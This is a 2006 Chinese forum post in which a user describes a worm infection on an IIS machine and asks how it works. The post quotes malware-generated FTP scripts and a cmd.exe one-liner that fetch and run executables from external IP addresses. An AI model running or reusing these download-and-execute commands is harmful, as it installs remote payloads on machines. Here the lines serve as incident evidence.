- 论坛徽章:
- 0
|
|
这几天,因为调试机器的iis,所以放火墙和杀毒软件关闭挂在网上,没有想到居然中个病毒winupdat,杀毒完毕,并且在system32下用dir /od\r\n发现近来产生了几个文件.其中一个dat文件,用ultra32打开发现下面的内容\r\nopen 222.173.211.102 15343 \r\nuser 1 1 \r\nget winupdat.exe \r\nquit \r\n看来是从此机器上下来的.删除之.并开启防火墙,对c盘完整杀毒,没有发现病毒.但是奇怪的是偶的防火墙依然拦截到ftp的出去请求.cmd下用pv -l (一个查看系统进程的小工具)查了下系统进程.如下:\r\n PROCESS PID COMMAND LINE\r\nwinlogon.exe 432 winlogon.exe\r\n\r\nservices.exe 476 C:\\WINDOWS\\system32\\services.exe\r\n\r\nlsass.exe 488 C:\\WINDOWS\\system32\\lsass.exe\r\n\r\nsvchost.exe 652 C:\\WINDOWS\\system32\\svchost -k rpcss\r\n\r\nsvchost.exe 688 C:\\WINDOWS\\System32\\svchost.exe -k netsvcs\r\n\r\nsvchost.exe 744 C:\\WINDOWS\\System32\\svchost.exe -k NetworkService\r\n\r\nspoolsv.exe 776 C:\\WINDOWS\\system32\\spoolsv.exe\r\n\r\nsvchost.exe 916 C:\\WINDOWS\\System32\\svchost.exe -k LocalService\r\n\r\ninetinfo.exe 964 C:\\WINDOWS\\System32\\inetsrv\\inetinfo.exe\r\n\r\nnvsvc32.exe 1040 C:\\WINDOWS\\System32\\nvsvc32.exe\r\n\r\nvsmon.exe 1080 C:\\WINDOWS\\system32\\ZONELABS\\vsmon.exe -service\r\n\r\nExplorer.EXE 1816 C:\\WINDOWS\\Explorer.EXE\r\n\r\nRunDll32.exe 540 \"C:\\WINDOWS\\System32\\RunDll32.exe\" cmicnfg.cpl,CMICtrlWnd\r\n\r\nzlclient.exe 1508 \"D:\\Program Files\\Zone Labs\\ZoneAlarm\\zlclient.exe\" \r\n\r\nctfmon.exe 1520 \"C:\\WINDOWS\\System32\\ctfmon.exe\" \r\n\r\nconime.exe 596 C:\\WINDOWS\\System32\\conime.exe\r\n\r\ncmd.exe 1752 cmd /k echo open 222.173.239.2 9726 > 8452&echo user lol lol >> 8452 &echo get firefox.exe >> 8452 &echo quit >> 8452 &ftp -n -s:8452 &del /F /Q 8452 &firefox.exe\r\n\r\n\r\nftp.exe 184 ftp -n -s:8452 \r\n\r\n\r\n\r\ncmd.exe 1064 \"C:\\WINDOWS\\System32\\cmd.exe\" \r\n\r\npv.exe 480 pv -l \r\n\r\n其中有一个系统cmd被调用.也是用系统ftp程序请求下载,偶有点郁闷,想知道是通过什么什么方式实现的.进程已经被禁止.难道是系统进程被插入而且调用cmd.但是偶的机器上发现两个\r\nopen 222.173.191.29 24999 \r\nuser lol lol \r\nget firefox.exe \r\nquit \r\nopen 222.173.239.2 9726 \r\nuser lol lol \r\nget firefox.exe \r\nquit \r\n地址也不一样.有那位知道请回复,正在思考中!!!! |
|
免费注册
发表于 2006-04-12 08:31
